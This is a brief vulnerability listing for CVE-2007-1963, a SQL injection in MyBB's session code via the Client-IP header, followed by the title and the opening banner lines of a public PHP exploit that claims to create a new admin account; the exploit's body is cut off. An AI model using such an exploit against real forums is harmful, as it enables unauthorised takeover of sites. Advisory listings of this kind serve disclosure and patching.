CVE-2007-1963

SQL injection vulnerability in the createsession function in classsession.php in MyBB aka MyBulletinBoard 1.2.3 and earlier allows remote attackers to execute arbitrary SQL commands via the Client-IP HTTP header, as utilized by index.php, a related issue to CVE-2006-3775...

MyBulletinBoard (MyBB) 1.1.5 - CLIENT-IP SQL Injection

MyBulletinBoard MyBB 1.1.5 - CLIENT-IP SQL Injection !/usr/bin/php -q -d shortopentag=on ? echo "MyBulletinBoard MyBB = 1.1.5 'CLIENT-IP' SQL injection / create new admin exploit\n"; echo "by rgod [email protected]\n"; echo "site: http://retrogod.altervista.org\n"; echo "dork, version specific:...